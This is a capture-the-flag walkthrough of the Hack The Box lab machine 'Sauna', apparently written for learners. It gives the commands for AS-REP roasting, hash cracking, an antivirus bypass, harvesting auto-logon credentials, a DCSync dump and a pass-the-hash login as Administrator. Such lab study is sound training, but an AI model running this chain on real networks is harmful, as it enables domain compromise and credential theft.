Sauna is a Windows Machine from Hack The Box that goes over a lot of different tools such as Impacket, WinPEAS, Bloodhound, and Evil-WinRM. We start by finding a couple of users from a webpage which leads us to using a Kerberoast brute force attack to grab their authentication hash. Once we gain access with that user, we find some saved auto-logon credentials of another user that we can use. We then perform a DC Sync attack which dumps all the domain hashes, including the administrator which leads to a pass the hash attack.
We can enumerate ports and services with nmap using the command sudo nmap -v -sV -sC -oN nmap 10.10.10.175 -p-
We are given 20 open ports which is common for a Windows Server running a Domain Controller:
Ports 389 and 3268 for LDAP shows the domain name EGOTISTICAL-BANK.LOCAL, let’s keep that in mind. For now, let’s take a look at the WebPage.
Going to http://10.10.10.175 shows a web page for Egotistical Bank:
While doing some manual enumeration, we come across some employee names on the About Us section of the website:
There is a danger about exposing names of employees for everyone to see. I created a text file of the employee names’:
Now we can use username-anarchy to generate some usernames and hopefully we can find one that we can use:
And we can see our output:
There is this great post on attacking Kerberos that includes AS-REP Roasting. Usually, when you request authentication through Kerberos, the requesting party has to authenticate itself to the Domain Controller. However, there is an option where the DC will just send the hash to an unauthenticated user: DONT_REQ_PREAUTH.
We can use Impacket’s GetNPUsers to look for any users that have this option enabled with the command while read p; do GetNPUsers.py egotistical-bank.local/”$p” -request -no-pass -dc-ip 10.10.10.175; done < usernames.txt
And we get a hit for user fsmith
I saved the hash to a file called hash.txt and we can crack it using John the Ripper with the command john hash.txt –wordlist=<path to rockyou.txt>
And we are given the password Thestrokes23.
We can confirm our findings using crackmapexec with the command crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23
We confirm our access to SMB but let’s see if we have remote access with crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23
And we do, so now we can use Evil-WinRM to establish a shell connection with evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
And we have access as FSmith. The user hash is found in FSmith’s Desktop directory:
I love Evil-WinRM’s ability to upload files and avoid any possible antivirus restrictions. We are going to use WinPeas to enumerate the system and see if we can find anything useful. First let’s go into Fsmith’s temp folder:
Then we can apply the AV bypass with the command Bypass-4MSI and then upload our WinPEAS binary with upload <local path to WinPEAS exe file>
Then we can run it with ./WinPEASx64.exe
Looking through the output, we find two interesting things, first is the username of svc_loanmgr:
And the second thing, the password:
It does point out that the default username is svc_loanmanager but we can check what the current username is by looking at the users directory:
We also could have found the password with this handy dandy command that queries the registry: reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>null | findstr “DefaultUserName DefaultDomainName DefaultPassword”
We can see if we have a remote connection for user svc_loanmgr with crackmapexec winrm 10.10.10.175 -u svc_loanmgr -p ‘Moneymakestheworldgoround!’
And we can use Evil-WinRM again with evil-winrm -i 10.10.10.175 -u svc_loanmgr -p ‘Moneymakestheworldgoround!’
I tried running WinPEAS again as svc_loanmgr but was unable to find anything useful. However, since we are dealing with Active Directory, a great tool to use is Bloodhound.
Installing it is pretty straightforward, I actually found this pretty good instructions page here.
Once you have bloodhound all set up, let’s find the data we need by running SharpHound on the target system. You can find the Sharphound binary from here. From the SharpCollection directory, we can use this command to locate our file: find . | grep -i sharphound
Copy that to the directory you want upload it from and then we can repeat the steps from before:
Once it’s done running, you should have zip file that has been saved:
Using the download command, we can download the zip file to our current directory:
Now that we have our Sharphound zip file, let’s fire up Bloodhound. First let’s start the neo4j console with sudo run neo4j console
Then on a separate terminal window, just type bloodhound
A login page should automatically open asking for your credentials:
Once logged in, we can upload the zip file by just clicking-and-dragging it onto the page:
Once it’s done. We can search for the user want to start with, which in this case is svc_loanmgr:
Right-click on the user node and Mark As Owned
Then head over to Analysis:
We can explore the DCSync attack. More information on that can be found here
We see that our node has GetChanges and GetChangesAll rights to the domain:
According to the article, the GetChanges and GetChangesAll rights is required to execute this attack:
Right-click on either the GetChanges or GetChangesAll line between the nodes and you can click on Help for more information:
The Info section also confirms our findings:
And the Abuse Info goes into how we can exploit this:
For a DCSync Attack, we can use Impacket’s secretsdump with the command secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:’Moneymakestheworldgoround!’@10.10.10.175
And we are given a couple of hashes, but most importantly, the Administrator hash. We can perform a Pass-The-Hash attack with Impacket’s wmiexec.py with the command wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
And we are in:
The root hash can be found in the Administrator’s Desktop Directory:
All in all, this was a fun box to learn a lot from. Understanding all of the different tools that you can use such as Impacket or Bloodhound will help you become a better PenTester. This box was challenging in the fact that the exploit paths weren’t always very visible. I found the use of the Kerberoasting attack using the employee’s name to be very realistic. Hope you enjoyed the write up!
Feel free to leave a comment if you have any questions or suggestions!